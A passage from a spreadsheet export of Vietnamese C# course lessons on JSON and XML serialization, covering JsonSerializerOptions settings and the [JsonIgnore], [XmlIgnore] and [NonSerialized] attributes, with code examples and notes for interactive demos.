System.Text.Json cung cấp một cách mạnh mẽ để tùy chỉnh quá trình serialization và deserialization thông qua lớp JsonSerializerOptions. Bằng cách truyền một instance của lớp này vào các phương thức Serialize hoặc Deserialize, bạn có thể điều chỉnh nhiều khía cạnh của quá trình chuyển đổi.
Dưới đây là một số tùy chọn cơ bản và thường được sử dụng:
WriteIndented: Kiểu bool. Nếu đặt là true, chuỗi JSON đầu ra sẽ được định dạng với các dòng và thụt lề để dễ đọc hơn cho con người. Mặc định là false.
PropertyNameCaseInsensitive: Kiểu bool. Nếu đặt là true, quá trình deserialization sẽ bỏ qua sự khác biệt về chữ hoa/thường khi khớp tên thuộc tính trong JSON với tên thuộc tính trong đối tượng C#. Điều này rất hữu ích khi bạn không thể kiểm soát hoàn toàn định dạng của JSON đầu vào. Mặc định là false.
PropertyNamingPolicy: Kiểu JsonNamingPolicy. Cho phép bạn chỉ định một chính sách đặt tên cho các thuộc tính JSON. Hai chính sách phổ biến là:
JsonNamingPolicy.CamelCase: Chuyển đổi tên thuộc tính C# từ PascalCase sang camelCase trong JSON (ví dụ: PublicationYear thành publicationYear). Đây là quy ước đặt tên phổ biến trong JavaScript và JSON.
null: Giữ nguyên tên thuộc tính C# (PascalCase). Đây là mặc định.
AllowTrailingCommas: Kiểu bool. Nếu đặt là true, quá trình deserialization sẽ cho phép các dấu phẩy cuối cùng trong các mảng hoặc đối tượng JSON (ví dụ: [1, 2, 3,] hoặc {"key": "value",}). Mặc định là false.
Ví dụ Serialize với JsonSerializerOptions
Hãy điều chỉnh ví dụ Book trước đó để sử dụng các tùy chọn:
using System;
using System.Text.Json;
using System.Collections.Generic;
public class Book
{
    public string Title { get; set; }
    public string Author { get; set; }
    public int PublicationYear { get; set; }
    public decimal Price { get; set; }
    public List&lt;string&gt; Genres { get; set; } = new List&lt;string&gt;();
}
public class OptionsSerializationExample
{
    public static void Main()
    {
        Book myBook = new Book
        {
            Title = "The Hitchhiker's Guide to the Galaxy",
            Author = "Douglas Adams",
            PublicationYear = 1979,
            Price = 12.99m,
            Genres = new List&lt;string&gt; { "Science Fiction", "Comedy" }
        };
        // 1. Tạo một đối tượng JsonSerializerOptions
        JsonSerializerOptions options = new JsonSerializerOptions
        {
            WriteIndented = true, // Định dạng JSON cho dễ đọc
            PropertyNamingPolicy = JsonNamingPolicy.CamelCase // Chuyển tên thuộc tính sang camelCase
        };
        // 2. Serialize đối tượng với các tùy chọn
        string jsonStringIndentedCamelCase = JsonSerializer.Serialize(myBook, options);
        Console.WriteLine("JSON sau khi Serialize (định dạng, camelCase):");
        Console.WriteLine(jsonStringIndentedCamelCase);
        // Output sẽ được định dạng và tên thuộc tính camelCase:
        /*
        {
          "title": "The Hitchhiker's Guide to the Galaxy",
          "author": "Douglas Adams",
          "publicationYear": 1979,
          "price": 12.99,
          "genres": [
            "Science Fiction",
            "Comedy"
          ]
        }
        */
        // 3. Deserialize từ chuỗi JSON có tên thuộc tính camelCase nhưng với tùy chọn PropertyNameCaseInsensitive = true
        // Giả sử chúng ta nhận được JSON từ một nguồn không chuẩn,
        // nơi tên thuộc tính có thể là PascalCase hoặc camelCase,
        // và chúng ta muốn deserialization hoạt động linh hoạt.
        string receivedJson = @"{
          ""Title"": ""The Hitchhiker's Guide to the Galaxy"",
          ""author"": ""Douglas Adams"",
          ""publicationYear"": 1979,
          ""price"": 12.99,
          ""genres"": [""Science Fiction"", ""Comedy""]
        }"; // Lưu ý 'Title' là PascalCase, 'author' là camelCase
        JsonSerializerOptions deserializeOptions = new JsonSerializerOptions
        {
            PropertyNameCaseInsensitive = true // Bỏ qua chữ hoa/thường khi khớp tên thuộc tính
        };
        Book? deserializedBookFlexible = JsonSerializer.Deserialize&lt;Book&gt;(receivedJson, deserializeOptions);
        if (deserializedBookFlexible != null)
        {
            Console.WriteLine("\nĐối tượng sau khi Deserialize (linh hoạt về tên thuộc tính):");
            Console.WriteLine($"Tiêu đề: {deserializedBookFlexible.Title}");
            Console.WriteLine($"Tác giả: {deserializedBookFlexible.Author}");
        }
    }
}
Trong ví dụ này, chúng ta thấy cách WriteIndented và PropertyNamingPolicy.CamelCase ảnh hưởng đến định dạng đầu ra của JSON. Quan trọng hơn, chúng ta thấy cách PropertyNameCaseInsensitive = true giúp chúng ta deserialize thành công một chuỗi JSON có sự không nhất quán về chữ hoa/thường trong tên thuộc tính, miễn là tên đó khớp về mặt ngữ nghĩa.
Việc nắm vững các tùy chọn cơ bản này là bước đầu tiên quan trọng để kiểm soát quá trình JSON serialization và deserialization trong các ứng dụng C# của bạn. Trong các bài học tiếp theo, chúng ta sẽ khám phá các tùy chọn nâng cao hơn và các tình huống phức tạp hơn.</t>
        </is>
      </c>
      <c r="W59" s="22" t="inlineStr">
        <is>
          <t># Sử dụng `System.Text.Json` cơ bản
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Dùng `JsonSerializer.Serialize` và `JsonSerializer.Deserialize&lt;T&gt;` để chuyển qua lại giữa đối tượng và chuỗi JSON.
- Dùng `JsonSerializerOptions` để đổi cách serialize và deserialize.
- Giải thích tác dụng của `WriteIndented`, `PropertyNamingPolicy` và `PropertyNameCaseInsensitive`.
- Nhận ra cái bẫy: mặc định khi đọc JSON, tên khóa **phân biệt chữ hoa chữ thường**.
- Quan sát kết quả của từng tùy chọn bằng hoạt động mô phỏng.
## Hai phương thức chính
`System.Text.Json` có sẵn trong .NET hiện đại, không cần cài thêm gói. Ta khai báo `using System.Text.Json;` rồi dùng lớp tĩnh `JsonSerializer`:
- `JsonSerializer.Serialize(obj)` trả về `string` JSON từ đối tượng.
- `JsonSerializer.Deserialize&lt;T&gt;(json)` trả về đối tượng kiểu `T` từ chuỗi JSON (có thể là `null`).
Hai phương thức này làm việc với các **thuộc tính public** của lớp.
```csharp
using System;
using System.Text.Json;
public class Person
{
    public string? Name { get; set; }
    public int Age { get; set; }
}
public class Program
{
    public static void Main()
    {
        var p = new Person { Name = "An", Age = 20 };
        string json = JsonSerializer.Serialize(p);
        Console.WriteLine(json);                   // {"Name":"An","Age":20}
        Person? p2 = JsonSerializer.Deserialize&lt;Person&gt;(json);
        Console.WriteLine(p2?.Name);               // An
    }
}
```
Nếu muốn ghi hoặc đọc thẳng với tệp, kết hợp với `File.WriteAllText(path, json)` và `File.ReadAllText(path)`.
## JsonSerializerOptions: tùy chọn hay dùng
Cả `Serialize` và `Deserialize` nhận thêm một đối tượng `JsonSerializerOptions` để tinh chỉnh. Ba tùy chọn người mới hay dùng nhất:
| Tùy chọn | Tác dụng | Mặc định |
|---|---|---|
| `WriteIndented` | `true`: JSON xuống dòng và thụt lề cho dễ đọc | `false` (viết liền một dòng) |
| `PropertyNamingPolicy` | `JsonNamingPolicy.CamelCase`: đổi tên khóa thành camelCase (`Name` thành `name`) | `null` (giữ nguyên tên C#) |
| `PropertyNameCaseInsensitive` | `true`: khi đọc, không phân biệt hoa thường giữa khóa JSON và tên thuộc tính | `false` |
### WriteIndented
Mỗi đoạn code dưới đây là một phần của hàm `Main`, dùng lại lớp `Person` và biến `p` ở ví dụ trên. Hãy thử từng đoạn riêng, mỗi lần một đoạn.
```csharp
var o1 = new JsonSerializerOptions { WriteIndented = false };
var o2 = new JsonSerializerOptions { WriteIndented = true };
Console.WriteLine(JsonSerializer.Serialize(p, o1));
// {"Name":"An","Age":20}
Console.WriteLine(JsonSerializer.Serialize(p, o2));
// {
//   "Name": "An",
//   "Age": 20
// }
```
Nội dung giống nhau, chỉ khác cách trình bày. Một dòng hợp để lưu hoặc gửi đi, nhiều dòng hợp để người đọc.
### PropertyNamingPolicy
Trong C#, ta đặt tên thuộc tính theo PascalCase (`Name`, `Age`), còn nhiều API web quen dùng camelCase (`name`, `age`). Dùng `PropertyNamingPolicy` để đổi mà không phải sửa tên thuộc tính:
```csharp
var o = new JsonSerializerOptions
{
    PropertyNamingPolicy = JsonNamingPolicy.CamelCase
};
Console.WriteLine(JsonSerializer.Serialize(p));      // {"Name":"An","Age":20}
Console.WriteLine(JsonSerializer.Serialize(p, o));   // {"name":"An","age":20}
```
### PropertyNameCaseInsensitive: cái bẫy khi đọc JSON
Khi **đọc**, `System.Text.Json` mặc định so khớp tên **phân biệt chữ hoa chữ thường**. Khóa `"name"` không khớp thuộc tính `Name`. Điều nguy hiểm là **không có lỗi nào**: khóa lạ chỉ bị bỏ qua, thuộc tính giữ giá trị mặc định.
```csharp
string json = "{\"name\":\"An\",\"age\":20}";   // khóa chữ thường
var p1 = JsonSerializer.Deserialize&lt;Person&gt;(json);
Console.WriteLine(p1?.Name);   // (dòng trống) vì Name = null
Console.WriteLine(p1?.Age);    // 0
var o = new JsonSerializerOptions { PropertyNameCaseInsensitive = true };
var p2 = JsonSerializer.Deserialize&lt;Person&gt;(json, o);
Console.WriteLine(p2?.Name);   // An
Console.WriteLine(p2?.Age);    // 20
```
&gt; **Lưu ý:** ASP.NET Core đã bật sẵn các thiết lập kiểu web (camelCase và không phân biệt hoa thường), còn ứng dụng console thì chưa. Vì vậy cùng một đoạn JSON có thể chạy đúng trong web nhưng đọc ra dữ liệu rỗng trong console.
Một cách khác là thống nhất tên: nếu JSON ghi bằng `PropertyNamingPolicy = CamelCase` thì đọc cũng dùng đúng tùy chọn đó.
## Hoạt động: Ba tùy chọn của System.Text.Json
Mô phỏng dưới đây dùng lớp `Person` có `Name = "An"` và `Age = 20`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **WriteIndented**. Hai cột đặt cạnh nhau: trái là `WriteIndented = false`, phải là `WriteIndented = true`. Cột trái cho `{"Name":"An","Age":20}` trên một dòng. Cột phải xuống dòng, mỗi thuộc tính một dòng, thụt vào 2 dấu cách. Nội dung giống hệt nhau, chỉ khác cách trình bày.
- Chuyển sang tab **Tên camelCase**. Cột trái ("Mặc định") giữ khóa `"Name"` và `"Age"`. Sau khi đặt `PropertyNamingPolicy = JsonNamingPolicy.CamelCase`, cột phải ("CamelCase") có khóa `"name"` và `"age"`, được tô sáng. Giá trị không đổi.
- Mở tab **Đọc JSON chữ thường**. JSON nhận vào có khóa `"name"` và `"age"`. Với tùy chọn mặc định, bảng "So khớp tên" báo "khác chữ hoa" ở cả hai hàng (tô đỏ). Kết quả `p1`: `Name = null`, `Age = 0`, chương trình in một dòng trống và không báo lỗi. Sau khi bật `PropertyNameCaseInsensitive = true`, bảng báo "khớp" (màu xanh) và `p2` có `Name = "An"`, `Age = 20`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/json-serialization-voi-system-text-json/su-dung-system-text-json-co-ban/" title="System.Text.Json cơ bản" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `JsonSerializerOptions` đổi cách trình bày JSON (`WriteIndented`), cách đặt tên khóa (`PropertyNamingPolicy`), và cách đọc (`PropertyNameCaseInsensitive`). Cái bẫy cần nhớ: khi đọc, mặc định hoa thường là khác nhau, và sai tên không gây lỗi mà chỉ cho dữ liệu rỗng.
## Tóm tắt
- `JsonSerializer.Serialize` biến đối tượng thành chuỗi JSON; `Deserialize&lt;T&gt;` làm ngược lại.
- `JsonSerializerOptions` truyền vào hai phương thức để tùy chỉnh.
- `WriteIndented = true` cho JSON nhiều dòng, dễ đọc; mặc định là `false`.
- `PropertyNamingPolicy = JsonNamingPolicy.CamelCase` đổi khóa thành `name`, `age`.
- Khi đọc, tên khóa mặc định phân biệt hoa thường; dùng `PropertyNameCaseInsensitive = true` hoặc đặt tên khớp.</t>
        </is>
      </c>
    </row>
    <row r="60" ht="409.6" customHeight="1" s="18">
      <c r="A60" s="10" t="n">
        <v>60</v>
      </c>
      <c r="B60" s="10" t="inlineStr">
        <is>
          <t>6. Lưu trữ Đối tượng với Serialization</t>
        </is>
      </c>
      <c r="C60" s="10" t="inlineStr">
        <is>
          <t>Các Kỹ Thuật Nâng Cao và Thực Tiễn</t>
        </is>
      </c>
      <c r="D60" s="10" t="inlineStr">
        <is>
          <t>Xử lý các trường `[NonSerialized]` và `[JsonIgnore]`</t>
        </is>
      </c>
      <c r="E60" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F60" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G60" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H60" s="10" t="inlineStr">
        <is>
          <t>Thấy [JsonIgnore] loại một thuộc tính khỏi JSON và hệ quả khi đọc lại.</t>
        </is>
      </c>
      <c r="I60" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Không có [JsonIgnore] | Có [JsonIgnore]</t>
        </is>
      </c>
      <c r="J60" s="10" t="inlineStr">
        <is>
          <t>Thẻ User có thuộc tính Password (biểu tượng ổ khóa). JSON hai bên: trái có "Password":"123456" (tô đỏ cảnh báo lộ dữ liệu), phải không có. Sau Deserialize, Password bên phải = null.</t>
        </is>
      </c>
      <c r="K60" s="10" t="inlineStr">
        <is>
          <t>H19</t>
        </is>
      </c>
      <c r="L60" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M60" s="10" t="inlineStr">
        <is>
          <t>User { Name = "An", Password = "123456" }.
Trái Serialize → JSON chứa mật khẩu.
Phải: [JsonIgnore] trên Password → JSON chỉ có Name.
Deserialize lại: phải Password = null (giá trị mặc định).
Xong: bảng thuộc tính bỏ qua theo từng bộ serializer.</t>
        </is>
      </c>
      <c r="N60" s="10" t="inlineStr">
        <is>
          <t>User An / 123456</t>
        </is>
      </c>
      <c r="O60" s="10" t="inlineStr">
        <is>
          <t>Dùng [JsonIgnore] cho dữ liệu nhạy cảm hoặc dữ liệu tính được; khi đọc lại, thuộc tính đó nhận giá trị mặc định.</t>
        </is>
      </c>
      <c r="P60" s="10" t="inlineStr">
        <is>
          <t>[NonSerialized] áp dụng cho trường và dùng với BinaryFormatter (đã loại bỏ); System.Text.Json dùng [JsonIgnore]; XmlSerializer dùng [XmlIgnore].</t>
        </is>
      </c>
      <c r="Q60" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/cac-ky-thuat-nang-cao-va-thuc-tien/xu-ly-cac-truong-nonserialized-va-jsonignore/index.html</t>
        </is>
      </c>
      <c r="R60" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/cac-ky-thuat-nang-cao-va-thuc-tien/xu-ly-cac-truong-nonserialized-va-jsonignore/</t>
        </is>
      </c>
      <c r="S60" s="10" t="n"/>
      <c r="T60" s="12" t="n"/>
      <c r="U60" s="12" t="n"/>
      <c r="V60" s="21" t="inlineStr">
        <is>
          <t>Mục đích của việc bỏ qua các trường trong Serialization
Khi bạn thực hiện serialization (chuyển đổi đối tượng thành chuỗi byte hoặc định dạng dữ liệu khác để lưu trữ/truyền tải), mục tiêu thường là lưu lại trạng thái cần thiết của đối tượng. Tuy nhiên, không phải tất cả các trường hoặc thuộc tính của một đối tượng đều phù hợp để được serialize. Có một số lý do chính mà chúng ta muốn bỏ qua một số trường nhất định:
Dữ liệu tạm thời hoặc không liên quan: Một số trường chỉ mang giá trị tạm thời trong suốt vòng đời của đối tượng trong bộ nhớ, ví dụ như một kết nối cơ sở dữ liệu đang mở, một luồng tệp (file stream), hoặc một giá trị đã được tính toán mà có thể dễ dàng tạo lại khi đối tượng được khôi phục. Việc serialize những trường này là không cần thiết và có thể gây lỗi.
Bảo mật và quyền riêng tư: Các thông tin nhạy cảm như mật khẩu, khóa API, hoặc dữ liệu cá nhân không nên được lưu trữ trực tiếp trong tệp serialized vì lý do bảo mật.
Hiệu suất và kích thước: Đối tượng có thể chứa các trường lớn hoặc phức tạp mà việc serialize chúng sẽ làm tăng kích thước dữ liệu và giảm hiệu suất. Nếu dữ liệu này không cần thiết cho trạng thái cốt lõi của đối tượng, việc bỏ qua nó là hợp lý.
Tham chiếu vòng lặp (Circular References): Trong một số trường hợp, các đối tượng có thể tham chiếu lẫn nhau tạo thành một vòng lặp. Nếu không được xử lý cẩn thận, việc serialize có thể dẫn đến vòng lặp vô hạn. Bỏ qua một số trường có thể phá vỡ vòng lặp này.
Khả năng tương thích phiên bản: Khi cấu trúc lớp thay đổi giữa các phiên bản ứng dụng, việc bỏ qua các trường mới trong khi deserialize đối tượng từ phiên bản cũ có thể giúp duy trì khả năng tương thích.
Để giải quyết những vấn đề này, C# cung cấp các thuộc tính (attributes) khác nhau cho phép bạn chỉ định các trường hoặc thuộc tính nào nên được bỏ qua trong quá trình serialization, tùy thuộc vào kỹ thuật serialization bạn đang sử dụng.
Sử dụng [NonSerialized] cho Binary Serialization
[NonSerialized] là một thuộc tính (attribute) được sử dụng đặc biệt cho Binary Serialization thông qua BinaryFormatter (và các formatter khác trong không gian tên System.Runtime.Serialization). Khi bạn đánh dấu một trường bằng [NonSerialized], BinaryFormatter sẽ bỏ qua trường đó và không bao gồm nó trong luồng byte được serialize.
Điểm cần lưu ý:
[NonSerialized] chỉ áp dụng cho trường (fields), không phải thuộc tính (properties).
Lớp chứa trường phải được đánh dấu bằng [Serializable].
Thuộc tính này nằm trong không gian tên System.Runtime.Serialization.
BinaryFormatter đã lỗi thời và không được khuyến khích sử dụng trong các ứng dụng hiện đại do các lỗ hổng bảo mật tiềm ẩn. Tuy nhiên, việc hiểu cách nó hoạt động vẫn quan trọng đối với các hệ thống kế thừa hoặc các ngữ cảnh cụ thể.
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
[Serializable]
public class CauHinhNguoiDung
{
    public string TenNguoiDung { get; set; }
    public string Email { get; set; }
    [NonSerialized] // Mật khẩu sẽ không được serialize
    private string _matKhauHash; 
    [NonSerialized] // Kết nối tạm thời sẽ không được serialize
    public object KetNoiCSDLTamThoi; 
    public CauHinhNguoiDung(string ten, string email, string matKhau)
    {
        TenNguoiDung = ten;
        Email = email;
        _matKhauHash = HashMatKhau(matKhau);
        // Giả sử KetNoiCSDLTamThoi được khởi tạo ở đâu đó và chỉ dùng tạm.
    }
    private string HashMatKhau(string matKhau)
    {
        // Thực hiện băm mật khẩu ở đây
        return $"hashed_{matKhau}";
    }
    public void HienThiThongTin()
    {
        Console.WriteLine($"Tên: {TenNguoiDung}, Email: {Email}, Mật khẩu hash: {(_matKhauHash ?? "Không có")}");
    }
}
public class BinarySerializationViDu
{
    public static void ChayViDu()
    {
        var cauHinh = new CauHinhNguoiDung("Alice", "alice@example.com", "password123");
        cauHinh.KetNoiCSDLTamThoi = new object(); // Giả lập một kết nối tạm thời
        Console.WriteLine("Trước khi serialize:");
        cauHinh.HienThiThongTin();
        // Serialize đối tượng
        using (Stream stream = File.Open("CauHinhNguoiDung.bin", FileMode.Create))
        {
            BinaryFormatter formatter = new BinaryFormatter();
            formatter.Serialize(stream, cauHinh);
        }
        Console.WriteLine("\nĐã serialize đối tượng (matKhauHash và KetNoiCSDLTamThoi bị bỏ qua).");
        // Deserialize đối tượng
        CauHinhNguoiDung cauHinhKhoiPhuc;
        using (Stream stream = File.Open("CauHinhNguoiDung.bin", FileMode.Open))
        {
            BinaryFormatter formatter = new BinaryFormatter();
            cauHinhKhoiPhuc = (CauHinhNguoiDung)formatter.Deserialize(stream);
        }
        Console.WriteLine("Sau khi deserialize:");
        cauHinhKhoiPhuc.HienThiThongTin(); // _matKhauHash sẽ là null hoặc giá trị mặc định
        Console.WriteLine($"KetNoiCSDLTamThoi sau deserialize: {(cauHinhKhoiPhuc.KetNoiCSDLTamThoi == null ? "null" : "có giá trị")}");
    }
}
Trong ví dụ trên, khi CauHinhNguoiDung được serialize, trường _matKhauHash và KetNoiCSDLTamThoi sẽ không được lưu. Khi đối tượng được deserialize, các trường này sẽ có giá trị mặc định của kiểu dữ liệu (ví dụ: null cho string và object).
Sử dụng [JsonIgnore] cho JSON Serialization (System.Text.Json)
Với JSON serialization sử dụng thư viện System.Text.Json (thư viện JSON mặc định trong .NET Core và .NET 5+), bạn có thể sử dụng thuộc tính [JsonIgnore] để bỏ qua các thuộc tính hoặc trường khi serialize đối tượng thành chuỗi JSON.
Điểm cần lưu ý:
[JsonIgnore] áp dụng cho cả thuộc tính (properties) và trường (fields) (tùy thuộc vào cấu hình của JsonSerializerOptions, mặc định chỉ serialize thuộc tính công khai).
Thuộc tính này nằm trong không gian tên System.Text.Json.Serialization.
System.Text.Json là một giải pháp hiện đại, hiệu quả và an toàn để làm việc với JSON trong .NET.
using System;
using System.Text.Json;
using System.Text.Json.Serialization;
public class ThongTinTaiKhoan
{
    public int Id { get; set; }
    public string TenDangNhap { get; set; }
    [JsonIgnore] // Mật khẩu sẽ không xuất hiện trong JSON
    public string MatKhau { get; set; } 
    public string Email { get; set; }
    [JsonIgnore] // Thuộc tính chỉ dùng nội bộ, không cần serialize
    public DateTime ThoiGianTaoTaiKhoan { get; set; } = DateTime.Now;
    public ThongTinTaiKhoan(int id, string ten, string matKhau, string email)
    {
        Id = id;
        TenDangNhap = ten;
        MatKhau = matKhau;
        Email = email;
    }
}
public class JsonSerializerViDu
{
    public static void ChayViDu()
    {
        var taiKhoan = new ThongTinTaiKhoan(1, "john.doe", "supersecret", "john.doe@example.com");
        // Serialize đối tượng thành chuỗi JSON
        string jsonString = JsonSerializer.Serialize(taiKhoan, new JsonSerializerOptions { WriteIndented = true });
        Console.WriteLine("JSON sau khi serialize (MatKhau và ThoiGianTaoTaiKhoan bị bỏ qua):");
        Console.WriteLine(jsonString);
        // Deserialize đối tượng từ chuỗi JSON
        ThongTinTaiKhoan taiKhoanKhoiPhuc = JsonSerializer.Deserialize&lt;ThongTinTaiKhoan&gt;(jsonString);
        Console.WriteLine("\nSau khi deserialize:");
        Console.WriteLine($"ID: {taiKhoanKhoiPhuc.Id}");
        Console.WriteLine($"Tên đăng nhập: {taiKhoanKhoiPhuc.TenDangNhap}");
        Console.WriteLine($"Mật khẩu (sẽ là null/mặc định vì bị bỏ qua): {taiKhoanKhoiPhuc.MatKhau ?? "null"}");
        Console.WriteLine($"Email: {taiKhoanKhoiPhuc.Email}");
        Console.WriteLine($"Thời gian tạo (sẽ là giá trị mặc định của DateTime): {taiKhoanKhoiPhuc.ThoiGianTaoTaiKhoan}");
    }
}
Trong đầu ra JSON, bạn sẽ thấy rằng các thuộc tính MatKhau và ThoiGianTaoTaiKhoan hoàn toàn không xuất hiện. Khi deserialize, chúng sẽ được khởi tạo với giá trị mặc định của kiểu dữ liệu.
Sử dụng [XmlIgnore] cho XML Serialization
Đối với XML serialization sử dụng System.Xml.Serialization.XmlSerializer, bạn sử dụng thuộc tính [XmlIgnore] để ngăn XmlSerializer serialize một thuộc tính hoặc trường công khai thành một phần tử XML.
Điểm cần lưu ý:
[XmlIgnore] áp dụng cho thuộc tính (properties) và trường (fields) công khai.
Thuộc tính này nằm trong không gian tên System.Xml.Serialization.
XmlSerializer chỉ serialize các thành viên công khai của một lớp.
using System;
using System.IO;
using System.Xml.Serialization;
public class DuLieuCauHinh
{
    public string TenCauHinh { get; set; }
    [XmlIgnore] // ID nội bộ sẽ không được serialize vào XML
    public Guid InternalId { get; set; } 
    public int PhienBan { get; set; }
    [XmlIgnore] // Thuộc tính chỉ đọc, không cần thiết trong XML
    public string DuLieuTamThoi =&gt; "Đây là dữ liệu tạm thời.";
    public DuLieuCauHinh() 
    { 
        InternalId = Guid.NewGuid(); 
    } // Cần constructor không tham số cho XmlSerializer
    public DuLieuCauHinh(string ten, int phienBan) : this()
    {
        TenCauHinh = ten;
        PhienBan = phienBan;
    }
}
public class XmlSerializerViDu
{
    public static void ChayViDu()
    {
        var cauHinh = new DuLieuCauHinh("Cấu hình ứng dụng chính", 1);
        Console.WriteLine($"ID nội bộ ban đầu: {cauHinh.InternalId}");
        // Serialize đối tượng thành XML
        XmlSerializer serializer = new XmlSerializer(typeof(DuLieuCauHinh));
        using (StringWriter writer = new StringWriter())
        {
            serializer.Serialize(writer, cauHinh);
            string xmlString = writer.ToString();
            Console.WriteLine("\nXML sau khi serialize (InternalId và DuLieuTamThoi bị bỏ qua):");
            Console.WriteLine(xmlString);
            // Deserialize đối tượng từ XML
            using (StringReader reader = new StringReader(xmlString))
            {
                DuLieuCauHinh cauHinhKhoiPhuc = (DuLieuCauHinh)serializer.Deserialize(reader);
                Console.WriteLine("\nSau khi deserialize:");
                Console.WriteLine($"Tên cấu hình: {cauHinhKhoiPhuc.TenCauHinh}");
                Console.WriteLine($"Phiên bản: {cauHinhKhoiPhuc.PhienBan}");
                Console.WriteLine($"ID nội bộ (sẽ là giá trị mặc định của Guid): {cauHinhKhoiPhuc.InternalId}");
                Console.WriteLine($"Dữ liệu tạm thời (sẽ được tạo lại): {cauHinhKhoiPhuc.DuLieuTamThoi}");
            }
        }
    }
}
Trong đầu ra XML, bạn sẽ không thấy bất kỳ thẻ nào cho InternalId hoặc DuLieuTamThoi. Khi deserialize, InternalId sẽ được khởi tạo với giá trị mặc định của Guid (tức là Guid.Empty), và DuLieuTamThoi sẽ được tính toán lại thông qua getter của nó.
Việc nắm vững cách sử dụng các thuộc tính [NonSerialized], [JsonIgnore] và [XmlIgnore] là rất quan trọng để kiểm soát chính xác dữ liệu nào được lưu trữ, đảm bảo bảo mật, tối ưu hiệu suất và duy trì tính toàn vẹn của ứng dụng khi làm việc với các cơ chế serialization khác nhau.</t>
        </is>
      </c>
      <c r="W60" s="22" t="inlineStr">
        <is>
          <t># Xử lý các trường `[NonSerialized]` và `[JsonIgnore]`
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Nêu lý do nên **bỏ qua** một số thuộc tính khi serialize.
- Dùng `[JsonIgnore]` để loại một thuộc tính khỏi JSON.
- Dùng `[XmlIgnore]` để loại một thuộc tính khỏi XML.
- Giải thích hệ quả khi đọc lại: thuộc tính bị bỏ qua nhận giá trị mặc định.
- Biết `[NonSerialized]` thuộc về `BinaryFormatter` (đã bị loại bỏ) nên không dùng cho code mới.
- Quan sát JSON có và không có `[JsonIgnore]` bằng hoạt động mô phỏng.
## Vì sao cần bỏ qua một số thuộc tính?
Mặc định, serialization ghi mọi thuộc tính public. Nhưng không phải thứ gì cũng nên lưu:
- **Dữ liệu nhạy cảm:** mật khẩu, khóa API, thông tin cá nhân. Lưu vào tệp hoặc gửi qua mạng thì ai cũng đọc được.
- **Dữ liệu tạm hoặc tính được:** kết nối đang mở, giá trị có thể tính lại từ các thuộc tính khác.
- **Dữ liệu lớn không cần thiết:** làm tệp nặng và chậm.
- **Tham chiếu vòng lặp:** hai đối tượng trỏ lẫn nhau có thể làm serialize lặp mãi hoặc báo lỗi.
Mỗi bộ serializer có một thuộc tính (attribute) riêng để loại bỏ:
| Bộ serializer | Attribute bỏ qua | Namespace |
|---|---|---|
| `System.Text.Json` | `[JsonIgnore]` | `System.Text.Json.Serialization` |
| `XmlSerializer` | `[XmlIgnore]` | `System.Xml.Serialization` |
| `BinaryFormatter` (đã bị loại bỏ) | `[NonSerialized]` | `System` |
## [JsonIgnore] với System.Text.Json
Gắn `[JsonIgnore]` lên thuộc tính để nó **không xuất hiện** trong JSON:
```csharp
using System;
using System.Text.Json;
using System.Text.Json.Serialization;
public class User
{
    public string Name { get; set; }
    [JsonIgnore]   // mật khẩu không bị ghi ra JSON
    public string Password { get; set; }
}
public class Program
{
    public static void Main()
    {
        var u = new User { Name = "An", Password = "123456" };
        string s = JsonSerializer.Serialize(u);
        Console.WriteLine(s);                       // {"Name":"An"}
        User u2 = JsonSerializer.Deserialize&lt;User&gt;(s)!;
        Console.WriteLine(u2.Name);                 // An
        Console.WriteLine(u2.Password is null);     // True
    }
}
```
Hai điểm cần nhớ:
- JSON không có `Password`, nên không thể lộ mật khẩu qua tệp hay đường truyền.
- Khi **đọc lại**, thuộc tính bị bỏ qua không có dữ liệu để gán, nên nó giữ giá trị mặc định của kiểu (`null` với `string`, `0` với `int`). Nếu lớp có sẵn giá trị khởi tạo, như `public int Level { get; set; } = 1;`, thì thuộc tính giữ giá trị khởi tạo đó.
Vì vậy chỉ dùng `[JsonIgnore]` cho dữ liệu mà bạn **chấp nhận mất** khi đọc lại, hoặc có thể tính lại.
## [XmlIgnore] với XmlSerializer
Với XML, dùng `[XmlIgnore]` trên thuộc tính hoặc trường public:
```csharp
using System.Xml.Serialization;
public class Settings
{
    public string Title { get; set; }
    [XmlIgnore]                       // không có thẻ XML cho thuộc tính này
    public string TempData { get; set; }
}
```
Lưu ý: `XmlSerializer` vốn chỉ ghi thành viên public và cần constructor không tham số. `[XmlIgnore]` dùng để loại thêm những thành viên public mà bạn không muốn lưu.
## [NonSerialized]: chỉ để nhận biết
`[NonSerialized]` là attribute của cơ chế cũ `BinaryFormatter`, áp dụng cho **trường** (field), kèm với `[Serializable]` trên lớp. Bạn có thể gặp nó trong tài liệu hoặc mã cũ.
&gt; **Lưu ý:** `BinaryFormatter` không an toàn khi đọc dữ liệu không tin cậy và đã bị loại bỏ trong .NET 9, nên không dùng cho code mới. Vì vậy bài này không dạy cách dùng `[NonSerialized]`. Với dữ liệu nhị phân tự ghi bằng `BinaryWriter`, bạn quyết định ghi trường nào, nên không cần attribute loại bỏ.
## Hoạt động: Có và không có [JsonIgnore]
Mô phỏng dưới đây chạy hai cột cùng lúc trên cùng một `User` có `Name = "An"` và `Password = "123456"`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để cả hai cột chạy từng dòng:
- Mở tab **Mật khẩu**. Cột trái là "Không có [JsonIgnore]", cột phải là "Có [JsonIgnore]" (hàng `Password [JsonIgnore]` trong bảng đối tượng ghi rõ điều này).
